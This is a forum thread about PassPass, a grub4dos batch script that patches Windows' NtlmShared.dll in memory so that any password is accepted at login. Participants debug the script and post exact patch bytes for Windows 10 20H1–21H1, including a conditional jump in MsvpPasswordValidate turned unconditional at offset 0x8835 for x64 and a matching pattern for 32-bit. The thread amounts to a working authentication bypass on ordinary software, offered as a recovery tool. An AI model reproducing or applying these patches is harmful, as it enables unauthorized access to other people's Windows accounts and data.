430 replies to this topic

[ner0]

I tested Chenall's version but auto-detection didn't work for me, it always returned "No Windows installation found!", twice.

Manually passing the disk and volume as arguments worked for patching options but booting from the menu wouldn't work either, giving the error "The selected disk does not exist". Not sure why auto-detection does not work.

 

EDIT: I think I'm starting to understand why it wasn't working, I must manually tell the script what is the max number of disks/partitions? This makes little sense to me, why isn't it determined programmatically? Or am I not understanding it correctly? What about this comment:

:: only checking the directory prefix with 'win'

If that really is the case, then why bother?

Edited by ner0, 04 December 2016 - 02:48 PM.

[Wonko the Sane]

Naaah, Chenall's version is a ("better" ) wenv-less version of the original PassPass by Holmes.Sherlock, some of the comments are left-overs from the latter version (and some are left-overs of previous experimental versions).

The "base" is the result of:
find --devices=h
If - for whatever reasons - the output of the above does not include your hard disk partition with the Windows install, it's game over.
Then the :autoloop calls the :findDLL for each device found and the :findDLL calls the :isWinDir for each directory in root of devices.


Maybe you have a peculiar setup?
Chenall version worked fine last time I tested it.


Wonko

[ner0]

find --devices=h

returns two results:

(hd0,1)

(hd0,0)

 

(hd0,1)/Windows is where the OS is located, afaik there's nothing peculiar about it at all.

If I call the script with max hd and volume numbers then it will iterate through them and find it.

[Wonko the Sane]

(hd0,1)/Windows is where the OS is located, afaik there's nothing peculiar about it at all.

If I call the script with max hd and volume numbers then it will iterate through them and find it.

Yep, there is an exclusion for the boot drive, maybe that is the issue in your case:

if exist BOOTDEV goto :skipBoot
if "%?_BOOT:~0,4%"=="%dev:~0,4%" goto %0		## Prevents searching boot device

Wonko

[ner0]

That's probably it, I was running the script from the same device and volume as Windows.

But I still don't understand how it iterates through folders. Does it go through all top level folders or just the ones that start with "win"?

[Wonko the Sane]

That's probably it, I was running the script from the same device and volume as Windows.

But I still don't understand how it iterates through folders. Does it go through all top level folders or just the ones that start with "win"?

All top level folders, it calls the :iswindir for all the output of  ls on the devices, one at the time:

ls %dllRoot%/ | call :isWinDir=

To easily check if that (boot device is the issue) re-map it to another device, *like*:

map (hd0) (hd2)

map --hook

before running the batch.

 

 

Wonko

[steve6375]

I have found that the routine which reads the version number one byte at a time can take several seconds using cat --length=1 each time.

The speed can be halved if we skip the 0 unicode byte by using an increment of 2 instead of 1

 

:fnext
if "%char%"=="." set version=%version%%%char%
set /a counter=%counter%+2 > nul
if "%counter%"=="30" goto :next
goto :loop

[ner0]

The speed can be halved if we skip the 0 unicode byte by using an increment of 2 instead of 1

 

Good idea!

[Wonko the Sane]

Good idea!

Hey guys, the "best" (from the point of actual batch scripting) is obviously the version by Chenall (that though only checks for majmin, does skip 1,3,5), the new "base" should be IMHO that one.

Additionally, he uses a Temp location, using the 00 as "C terminator".

:: Only get majmin version
dd if=%file% of=%Temp% bs=1 skip=%offbase% count=32 > nul
cat --skip=1 %Temp% | set majmin=
cat --skip=3 %Temp% | set majmin=%majmin%
cat --skip=5 %Temp% | set majmin=%majmin%

This should be the "full version" loop using the same technique:

:: Get full version
dd if=%file% of=%Temp% bs=1 skip=%offbase% count=32 > nul
set /a counter=1 > nul
set majmin3=
:version_loop
cat --skip=%counter% %Temp% | set majmin3=%majmin3%
if "%majmin3:~-1,1%"==" " set majmin3=%majmin3:~0,-1% && goto :outofloop
set /a counter=%counter%+2 > nul
goto :version_loop

:outofloop

Wonko

[mizzcrazi]

[steve6375]

It seems Windows 10 21H1 has changed the ntlmshared.dll code and PassPass no longer works on this new version.

I have looked at the new code with IDA and the new subroutine seems a lot more complex and I cannot figure out what to patch. I suspect it needs to be patched in more than one place...

[ner0]

Can you share NtlmShared.dll from 21H1?

[steve6375]

Password is passpass

 

Attached Files

•  NtlmShared.zip   33.84KB   152 downloads

[ner0]

Which was the last version that you had compatibility with, Win10 1909?

 

Apparently this file is the same since Win10 2004/20H2/21H1.

 

I stopped looking at this since Win10 1607, but I might try to take a look at it when I have some spare time.

[steve6375]

I dont know when it changed - I haven't tested it for ages

Is Win11 same?

[ner0]

Not sure, I haven't tried Windows 11 and have no plans to, seems to be too much of a hassle at the moment.

 

I also haven't looked at this in a long time; according to Wikipedia, it might have changed in one of these releases:

• 1703 (Creators Update)
• 1709 (Fall Creators Update)
• 1803 (April 2018 Update)
• 1809 (October 2018 Update)
• 1903 (May 2019 Update)
• 1909 (November 2019 Update)
• 2004 (May 2020 Update)

But still, that doesn't really solve the issue.

It would be cool if someone more experienced with assembly could have a look, I'll give it a try at a later time but if it really is drastically different as you stated then I probably won't make any progress either.

Edited by ner0, 04 August 2021 - 11:55 AM.

[steve6375]

The same subroutine is there, but it is way more complicated with jumps all over the place!

 

Attached Thumbnails

• 

[ner0]

I don't have IDA in the machine I'm in, but it seems to be very different indeed, traditionally the NOP would just be placed in the jne (or jnz) which in this version is located at 0x8835, but it's a straight je (or jz) with pattern 0F 84 BA FA FF FF, I doubt NOPing this does the trick.

[ner0]

New NtlmShared.dll file version:

• Windows 10 Pro (x64) v20H1/v20H2/v21H1
• NtlmShared.dll v10.0.19041.1
• MD-5: 68A29D04B882CD44F52590F6E5944320
• SHA-1: 8251967983CF1E30A94C206AD60A3F6452D22ABD

 

Here I've had success by patching the conditional jump into an unconditional one instead, 6 bytes at address 0x8835:

• Originally: 0F 84 BA FA FF FF
•   Patched: E9 BB FA FF FF 90

 

 

Graphical view from MsvpPasswordValidate function

 

 

Text view from MsvpPasswordValidate function

 

 

Hex view for the jump (JZ) to be patched in MsvpPasswordValidate function

[steve6375]

good work! It seems to work great!

[steve6375]

I tried with the 32-bit version and failed :-(

 

 

Could you work your magic on this please and let me know the new bytes?

thanks

 

Attached Thumbnails

• 

Attached Files

•  NtlmShared32.zip   29.78KB   128 downloads

[steve6375]

It's OK, I managed to work it out eventually after many unsuccessful attempts!

if "%majmin%"=="10.0" set patt=\xC6\x0F\x84\x63\xFB\xFF\xFF && set rpatt=\xC6\xE9\x64\xFB\xFF\xFF\x90

thanks!

[ner0]

Nice, glad you were able to find it.

 

I had thought about it after doing it for x64, but... for one I didn't have x86 copy around and I also thought that at this point people wouldn't be using 32bit; but then again there are always some edge cases.

[steve6375]

E2B v2.10eBeta has new PassPass with later Win10 support

https://1drv.ms/u/s!...dDg0oH?e=JRyz5R

[Wonko the Sane]

Here I've had success by patching the conditional jump into an unconditional one instead, 6 bytes at address 0x8835:

• Originally: 0F 84 BA FA FF FF
•   Patched: E9 BB FA FF FF 90

 

It's OK, I managed to work it out eventually after many unsuccessful attempts!

if "%majmin%"=="10.0" set patt=\xC6\x0F\x84\x63\xFB\xFF\xFF && set rpatt=\xC6\xE9\x64\xFB\xFF\xFF\x90

thanks!

 

Maybe stupid question/doubt, but is this "universal" for all (stupid) Windows 10 (stupid) versions?

Or this is for latest-latest only?

Is there a way to check (besides maj/min versions) the versions ner0 listed?

 

 

 

I also haven't looked at this in a long time; according to Wikipedia, it might have changed in one of these releases:

• 1703 (Creators Update)
• 1709 (Fall Creators Update)
• 1803 (April 2018 Update)
• 1809 (October 2018 Update)
• 1903 (May 2019 Update)
• 1909 (November 2019 Update)
• 2004 (May 2020 Update)

 

 

 

Wonko